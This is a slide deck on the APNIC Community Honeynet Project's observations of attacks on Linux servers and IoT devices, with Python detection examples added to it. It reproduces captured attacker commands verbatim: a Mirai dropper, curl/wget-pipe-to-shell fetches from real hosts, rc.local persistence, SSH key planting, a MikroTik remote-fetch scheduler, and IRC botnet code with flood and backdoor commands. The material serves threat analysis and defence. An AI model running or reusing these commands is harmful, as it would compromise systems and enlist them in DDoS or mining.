Observations and Lessons Learned from
the APNIC Community Honeynet Project
Adli Wahid
Senior Internet Security Specialist, APNIC
adli@apnic.net
Let’s Connect!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP key fingerprint: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
Talk Overview
1. APNIC Community Honeynet Project
2. Observations on activities targeting Linux servers and IoT devices
3. Lessons Learned / Reflections
Overview of the APNIC Community Honeynet Project
APNIC Community Honeynet Project
• Context
– Educational – using honeypots to understand network security attacks and threats, as part of our network security training
– Situational awareness, the bigger picture, cooperation with other stakeholders, tools (e.g. the MISP threat sharing platform, Wireshark, Suricata)
• Collaboration
– Partners deploy honeypots, APNIC runs the backend
– Information collected among partners & threat sharing*
• Outcomes
– More than 50 distributed honeypots* in the AP region since 2017
– Share threat information with APNIC members and partners (e.g. CERTs/CSIRTs, network operators)
• https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind-the-scenes/
• https://dash.apnic.net
APNIC Community Honeypot
1. Purpose and Placement
o Research & alerting; sensors are Internet-facing
2. Type of Honeypots
o Cowrie, Dionaea, RDPHoney
3. Deployment
– Community Honey Network (fork of Modern Honey Network)
– Partners & self-hosting
4. Data Collection & Analysis & Action
– Logs, visualization, alerts, action (incident response)
– Elasticsearch, Kibana, Logstash, Beats
– Suricata IDS
– ElastAlert + Slack
5. Maintenance
– Ansible
– LibreNMS
(Screenshots: detection with Suricata rulesets; Slack alert)
Community Honeynet Infrastructure
(Diagram) Distributed honeypots → hpfeeds → CHN / MHN servers → Filebeat (JSON) → TLS → Logstash → Elasticsearch → Kibana and ElastAlert; data is also exported to BigQuery.
MHN – Modern Honey Network
CHN – Community Honey Network
(Chart) Traffic from the last 30 days
(Chart) Country view – Pakistan (last 90 days)
Observations and Lessons Learned
Linux/Unix Malware
• Routers, IoT devices and servers run Linux/Unix-based operating systems
• Not new, but pervasive
– Targets are exposed on the Internet (HTTP, Telnet, SSH)
– Unpatched / unmonitored (e.g. no anti-virus, firmware upgrades not applied)
– Default or weak credentials
• Popular example – Mirai (DDoS agent)
– Source code was shared publicly
– Many variants – josho, owari, masuta, sora, etc.
– Gafgyt (another IoT DDoS family)
• Simple techniques for infecting, spreading and persisting
• Interesting scenarios
– Working from home
– Servers / hosting / cloud
Different Perspectives of a DDoS
(Diagram) The same attack seen from three positions: the source (my network / infrastructure / host, where bots are recruited), the target / victim, and the attacker.
Service & Attacker Infrastructure
• Setting up the infrastructure
• Misconfigured services
– Servers – NTP, DNS, SSDP, etc.
– Amplification attack: the request carries a spoofed source address (the victim's), so the much larger reply is delivered to the victim
– https://stats.cybergreen.net/
– https://www.shadowserver.org/what-we-do/network-reporting/get-reports
• Active bot “recruitment”
– Internet-exposed services
– Vulnerable devices
– Weak credentials
“Recruitment Process”
(Diagram) The attacker turns an exposed device into a DDoS source:
1. Scan and gain access: brute force (username: admin, password: 12345) or remote code execution via the web interface
2. Download binary / execute, e.g. wget http://37.x.2x.190:80/13747243572475/hx86_64
3. Connect to command and control (C&C)
Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
– Allows the attacker to log in
• Emulates a Linux/Unix environment
– Captures the commands issued by the attacker after login
– Including downloads
• “Look and feel” of Linux/Unix servers and IoT devices
• Attracts a certain class of attacks
– Scan for SSH/Telnet
– Brute-force username/password
– Login & execute payload(s)
• DDoS agents & cryptominers
– Identified from post-login activities and the binaries collected
(Screenshot: Mirai sample – 2016)
Successful Logins – New Honeypot
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:50.568233Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "123.b.c.12",
  "session": "fd7977b0b54a",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:59.378766Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "80.x.y.62",
  "session": "fdcd399b1282",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
Two different source IPs log in with the same unusual password within nine seconds of each other: the credential is a well-known IoT default that sits in a shared brute-force list, not something guessed on the spot.
Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
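Added example (not from the APNIC deck): a short Python script that reads Cowrie's JSON event lines, like the two above, and reports credentials that succeeded from more than one source IP, which is the signal that a shared brute-force list is being worked through. The sample lines are constructed for the example and use documentation-range IPs; the field names follow Cowrie's jsonlog output exactly as shown on the slide.

```python
"""Correlate Cowrie login events: which credentials succeeded from several sources?

Added example, not part of the APNIC deck.  Input is Cowrie's jsonlog format
(one JSON object per line).  Sample lines are constructed; IPs are from the
documentation ranges.
"""
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample log (field names as in Cowrie's jsonlog output).
SAMPLE_LOG = """\
{"eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "src_ip": "198.51.100.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001"}
{"eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "src_ip": "203.0.113.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001"}
{"eventid": "cowrie.login.failed", "username": "admin", "timestamp": "2018-10-07T19:32:01.000000Z", "src_ip": "203.0.113.62", "session": "fdcd399b1283", "password": "12345", "sensor": "mn-001"}
{"eventid": "cowrie.login.success", "username": "admin", "timestamp": "2018-10-07T19:40:00.000000Z", "src_ip": "192.0.2.9", "session": "0a1b2c3d4e5f", "password": "admin", "sensor": "mn-002"}
{"eventid": "cowrie.session.connect", "timestamp": "2018-10-07T19:40:01.000000Z", "src_ip": "192.0.2.9", "session": "0a1b2c3d4e60", "sensor": "mn-002"}
"""


def _ts(value):
    # Cowrie timestamps are ISO 8601 with microseconds and a trailing Z.
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")


def parse_events(text):
    """Yield parsed events, skipping blank or malformed lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def successful_logins(events):
    """Group cowrie.login.success events by (username, password)."""
    groups = defaultdict(list)
    for ev in events:
        if ev.get("eventid") != "cowrie.login.success":
            continue
        groups[(ev["username"], ev["password"])].append(ev)
    return groups


def shared_credentials(text, min_sources=2):
    """Credentials that succeeded from at least min_sources distinct IPs.

    Returns (username, password, sorted src_ips, sorted sensors,
    seconds between the first and last success).
    """
    results = []
    for (user, pw), evs in successful_logins(parse_events(text)).items():
        ips = sorted({e["src_ip"] for e in evs})
        if len(ips) < min_sources:
            continue
        sensors = sorted({e["sensor"] for e in evs})
        times = sorted(_ts(e["timestamp"]) for e in evs)
        span = (times[-1] - times[0]).total_seconds()
        results.append((user, pw, ips, sensors, span))
    return results


if __name__ == "__main__":
    for user, pw, ips, sensors, span in shared_credentials(SAMPLE_LOG):
        print(f"{user}/{pw}: {len(ips)} sources {ips} on {sensors}, "
              f"{span:.0f}s between first and last success")
```

Run it over a day of `cowrie.json` and the credentials that recur across unrelated IPs are the ones worth adding to a watchlist; a password that succeeds once from one IP is noise by comparison.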
Execute Payload
Captured Mirai dropper, as received (typos included): it tries several writable directories, fetches the MIPS binary over HTTP with a BusyBox fallback and then over TFTP, runs it and deletes the file.
#!/bin/sh
cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
Other captured post-login payloads (the \n and \r\n escape sequences were lost in extraction and are restored here):

Disable the firewall, fetch and run a binary, persist via rc.local:
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;

Replace the user's SSH authorized keys with the attacker's key:
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Change the account password (current password, then the new one twice):
echo -e "password\n1o53kTj3yZq9\n1o53kTj3yZq9"|passwd|bash

MikroTik RouterOS: a scheduler entry that fetches and imports a script every 10 minutes with full policy rights:
system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
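Added example (not from the APNIC deck): a host audit in Python for the two Linux persistence tricks shown above, a planted `authorized_keys` entry and lines appended to `/etc/rc.local`. It flags any SSH key whose blob is not on an allowlist and any rc.local line that disables the firewall, runs from a world-writable directory, or sits after `exit 0`. The file contents are constructed for the example (the key blobs are not real keys), and the allowlist is an assumption you would replace with your own inventory.

```python
"""Audit authorized_keys and rc.local for the persistence seen in captured payloads.

Added example, not part of the APNIC deck.  File contents below are constructed;
ALLOWED_KEY_BLOBS stands in for an inventory of keys you actually issued.
"""
import base64
import hashlib
import re

# Constructed authorized_keys: one legitimate key and one planted key whose
# comment matches the captured payload.  Neither blob is a real key.
AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGfbbmPw7Ktb4tdb3yWAJjs7W4GLC7tsPOgswRy6rhtD ops@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 mdrfckr
"""
ALLOWED_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIGfbbmPw7Ktb4tdb3yWAJjs7W4GLC7tsPOgswRy6rhtD"}

# Constructed rc.local after the dropper appended its three echo'd lines.
RC_LOCAL = """\
#!/bin/sh -e
exit 0
cd /tmp/
./dx&
/etc/init.d/iptables stop
"""

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")
FIREWALL_OFF = re.compile(r"(iptables|SuSEfirewall2|firewalld|ufw)\b.*\b(stop|disable)\b|iptables\s+-F")
TMP_EXEC = re.compile(r"(^|[;&|]\s*)\./\S+|/(tmp|var/tmp|dev/shm)(/|\s|$)")


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob, for the report."""
    try:
        digest = hashlib.sha256(base64.b64decode(blob)).digest()
    except ValueError:
        return "SHA256:<invalid-base64>"
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def split_key_line(line):
    """(keytype, blob, comment) for one entry, skipping leading options like from=..."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok.startswith(KEY_TYPES) and i + 1 < len(tokens):
            return tok, tokens[i + 1], " ".join(tokens[i + 2:])
    return None


def audit_authorized_keys(text, allowed_blobs):
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parsed = split_key_line(line)
        if parsed is None:
            findings.append(("authorized_keys", n, "unparseable entry"))
            continue
        keytype, blob, comment = parsed
        if blob not in allowed_blobs:
            findings.append(("authorized_keys", n,
                             f"unknown {keytype} key {fingerprint(blob)} comment={comment!r}"))
    return findings


def audit_rc_local(text):
    findings = []
    after_exit = False
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        reasons = []
        if FIREWALL_OFF.search(s):
            reasons.append("disables host firewall")
        if TMP_EXEC.search(s):
            reasons.append("runs from or enters a world-writable directory")
        if after_exit:
            reasons.append("appended after 'exit 0' (tampering; never executes)")
        if reasons:
            findings.append(("rc.local", n, "; ".join(reasons)))
        if re.fullmatch(r"exit\s+0", s):
            after_exit = True
    return findings


def audit_host(authorized_keys=AUTHORIZED_KEYS, rc_local=RC_LOCAL, allowed=ALLOWED_KEY_BLOBS):
    return audit_authorized_keys(authorized_keys, allowed) + audit_rc_local(rc_local)


if __name__ == "__main__":
    for source, lineno, reason in audit_host():
        print(f"{source}:{lineno}: {reason}")
```

On a real host, feed it `~/.ssh/authorized_keys` for every account (root included) and `/etc/rc.local`; the MikroTik scheduler case above needs the equivalent check on `/system scheduler print` output instead, since RouterOS has neither file.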
Perl Script
Captured command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt
Excerpt of the downloaded script: the IRC server, port, channel and admin nicknames are hard-coded
my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick = $rircname[rand scalar @rircname];
my $server = '125.x.y.z53';
my $port = '1947';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");
Bot command help (redu`s PerlBot); the digits 4,1 / 9,1 / 12 are mIRC colour codes whose \x03 control characters were lost in extraction:
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help:
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip>
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example)
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
}
Source code of an IRC-based bot (built-in help text)
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
Note the DNS command, which takes a “reflection file” of open resolvers (the amplification abuse from the misconfigured-services slide), and LOCKUP, which kills telnet and installs a backdoor.
Linux/Mirai – Fbot
https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html
Alerts from two sensors: same binary URL, different source IPs and credentials
2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab-7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech']
2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518']
Cryptominers / Cryptojacking
Captured one-liner that fetches a script and pipes it straight into sh (the opening parenthesis was lost in extraction):
(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
Snippet of the downloaded shell script: the 64-bit payload is fetched from third-party CDN and file-upload hosts, some disguised with image extensions, with several fallbacks
if [ ! -f "4d867bd38706a5f7" ]; then
  ARCH=$(getconf LONG_BIT)
  if [ ${ARCH}x = "64x" ]; then
    (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7
    ||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7
    ||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7
    ||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7
    ||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7
    ||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
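Added example (not from the APNIC deck): Python that pulls download indicators out of captured shell payloads like the Mirai dropper, the rc.local dropper, the one-liner and the snippet above. It splits the script into simple commands, recognises `wget`, `curl` and `tftp` (including the `busybox` prefix and scheme-less hosts), and returns the normalised URL plus the local filename; `sha256_hex()` is the hash you would compute over a fetched sample before a lookup. The payload strings are copied from the captured scripts above with the operators' hosts left as written; nothing is downloaded.

```python
"""Extract download URLs and drop filenames from captured shell payloads.

Added example, not part of the APNIC deck.  PAYLOADS are copied from the
captured scripts above; the code never fetches anything.
"""
import hashlib
import re
import shlex
from urllib.parse import urlsplit

PAYLOADS = {
    "mirai_dropper": (
        "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
        "wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; "
        "busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; "
        "tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; "
        "chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips"
    ),
    "miner_oneliner": "(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &",
    "image_cdn": (
        "curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7 "
        "||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7"
    ),
}

# Shell list, pipe and grouping operators; each segment is one simple command.
SEGMENT = re.compile(r"\|\||&&|[;|&()\n]")
FETCHERS = ("wget", "curl", "tftp")


def _basename(url):
    return urlsplit(url).path.rsplit("/", 1)[-1]


def parse_http(toks):
    """wget/curl argv -> indicator dict, or None when no URL is present."""
    tool, url, saved_as = toks[0], None, None
    i = 1
    while i < len(toks):
        t = toks[i]
        if (tool == "wget" and t == "-O") or (tool == "curl" and t == "-o"):
            saved_as = toks[i + 1] if i + 1 < len(toks) else None
            i += 2
            continue
        if tool == "wget" and t == "-O-":
            saved_as = "<stdout>"
        elif not t.startswith("-"):
            url = t  # -q, -fsSL, -m180, -T180, -c carry no separate value
        i += 1
    if url is None:
        return None
    if "://" not in url:
        url = "http://" + url  # both tools default to HTTP for a bare host
    if saved_as is None:
        if tool == "curl":
            saved_as = _basename(url) if "-O" in toks else "<stdout>"
        else:
            saved_as = _basename(url) or "index.html"
    return {"tool": tool, "url": url, "saved_as": saved_as}


def parse_tftp(toks):
    """tftp argv (-r remote [-l local] host, -g/-p flags) -> indicator dict."""
    remote = local = host = None
    i = 1
    while i < len(toks):
        t = toks[i]
        if t in ("-r", "-l") and i + 1 < len(toks):
            if t == "-r":
                remote = toks[i + 1]
            else:
                local = toks[i + 1]
            i += 2
            continue
        if not t.startswith("-"):
            host = t
        i += 1
    if not (host and remote):
        return None
    return {"tool": "tftp", "url": f"tftp://{host}/{remote}", "saved_as": local or remote}


def extract_downloads(script):
    """Unique (url, saved_as) fetches in a captured script, in order of appearance."""
    found, seen = [], set()
    for segment in SEGMENT.split(script):
        try:
            toks = shlex.split(segment)
        except ValueError:  # unbalanced quotes in a truncated capture
            continue
        if toks and toks[0] == "busybox":
            toks = toks[1:]
        if not toks or toks[0] not in FETCHERS:
            continue
        hit = parse_tftp(toks) if toks[0] == "tftp" else parse_http(toks)
        if hit and (hit["url"], hit["saved_as"]) not in seen:
            seen.add((hit["url"], hit["saved_as"]))
            found.append(hit)
    return found


def indicator_hosts(scripts):
    """Hosts to block or hunt for, across several payloads."""
    return {urlsplit(h["url"]).hostname for s in scripts for h in extract_downloads(s)}


def sha256_hex(data):
    """Hash of a fetched sample, for lookups on sharing platforms such as MISP."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    for name, script in PAYLOADS.items():
        for hit in extract_downloads(script):
            print(f"{name}: {hit['tool']} {hit['url']} -> {hit['saved_as']}")
    print(sorted(indicator_hosts(PAYLOADS.values())))
```

The point of the `saved_as` column is the last slide's observation that the hash belongs to the URL, not the filename: the same random-looking drop name is reused across three different hosts, so the name is useless as an indicator while the URL and the file hash are not.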
Find the hash of the sample served by the URL (SHA-256): a5fba021a41c520a81647cda41110033eba4f8842eb3239f227bcbb0b1b110d6
Rocke Gang
1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916 (May 2019)
2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers (May 2019)
3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect (Oct 2019)
4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/ (Oct 2019)
Cryptominer found running as www-data on a compromised web server (ps output). A restart loop keeps the miner alive, its stdout/stderr are thrown away through bash's /dev/udp pseudo-device, and the pool (-o) and wallet (-u) arguments are the indicators to extract:
www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
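Added example (not from the APNIC deck): Python that scores `ps aux` lines for the miner traits visible in the capture above, a pool host:port passed to `-o`/`--url`, a Monero address passed to `-u`, and xmrig-style flags. The ps lines are constructed for the example; the two www-data lines mirror the captured one with a placeholder path where the slide's is truncated. The scoring weights and the flag list are assumptions, not taken from the deck.

```python
"""Flag likely cryptominer processes from `ps aux` output.

Added example, not part of the APNIC deck.  PS_SAMPLE is constructed; the
weights in score_process() and MINER_FLAGS are assumptions.
"""
import re

# Standard Monero addresses are 95 base58 characters starting with 4 (8 for subaddresses).
MONERO_ADDR = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
# A pool given as -o host:port or --url host:port, optionally with a stratum scheme.
POOL_OPT = re.compile(
    r"(?:^|\s)(?:-o|--url[=\s])\s*(?:stratum\+(?:ssl|tcp)://)?([A-Za-z0-9.-]+):(\d{2,5})\b")
# xmrig-style options; short ones are weak on their own, hence the scoring below.
MINER_FLAGS = {"--donate-level", "--cpu-priority", "--max-cpu-usage", "--randomx-1gb-pages",
               "--keepalive", "-k", "--nicehash", "--coin", "--algo", "-a", "--threads", "-t"}

# Wallet from the captured command line (public data on the slide).
WALLET = ("49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd"
          "Xi83P4uEoGyD5eTc")

# Constructed `ps aux` output; /var/www/html stands in for the truncated path.
PS_SAMPLE = f"""\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169364 11236 ?        Ss   Mar20   0:05 /sbin/init
www-data 17838  0.0  0.0   4452   636 ?        S    Mar20   0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/html/files/media-icons/xm2sg -l /var/www/html/files/media-icons/out.txt -o pool.minexmr.com:4444 -u {WALLET}.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/html/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )'
www-data 17901 99.3  0.4 286112 18920 ?        Sl   Mar20 412:15 /var/www/html/files/media-icons/xm2sg -l /var/www/html/files/media-icons/out.txt -o pool.minexmr.com:4444 -u {WALLET}.0+10000 -k
builder   2210  0.0  0.0  12840  2104 pts/0    S+   10:02   0:00 gcc -o server main.c
root       900  0.0  0.0  72300  5840 ?        Ss   Mar20   0:00 /usr/sbin/sshd -D
"""


def score_process(cmdline):
    """Return (score, reasons): pool +2, wallet +3, each distinct miner flag +1."""
    score, reasons = 0, []
    m = POOL_OPT.search(cmdline)
    if m:
        score += 2
        reasons.append(f"mining pool {m.group(1)}:{m.group(2)}")
    w = MONERO_ADDR.search(cmdline)
    if w:
        score += 3
        reasons.append(f"monero wallet {w.group(0)[:6]}...{w.group(0)[-6:]}")
    flags = sorted({t.split("=", 1)[0] for t in cmdline.split()} & MINER_FLAGS)
    if flags:
        score += len(flags)
        reasons.append("miner flags " + " ".join(flags))
    return score, reasons


def find_miners(ps_output, threshold=3):
    """Processes whose command line scores at or above threshold."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 10)  # ps aux: 10 fixed columns, then COMMAND
        if len(parts) < 11 or parts[0] == "USER":
            continue
        score, reasons = score_process(parts[10])
        if score >= threshold:
            hits.append({"user": parts[0], "pid": int(parts[1]), "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_miners(PS_SAMPLE):
        print(f"pid {hit['pid']} ({hit['user']}) score {hit['score']}: {'; '.join(hit['reasons'])}")
```

With these weights a pool or a wallet alone is enough to reach the threshold, while short flags such as `-k` or `-t` never are on their own, so `gcc -o server main.c` and `tar -t` stay quiet. Miners that read their pool and wallet from a config file instead of the command line will not score, which is why a CPU-time check (the 412:15 in the second www-data line) belongs alongside this one.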
Analysis – Interesting indicators
• IP addresses of the hosts used for initial access, which run the script that downloads the binary/malware
– Normally compromised systems themselves
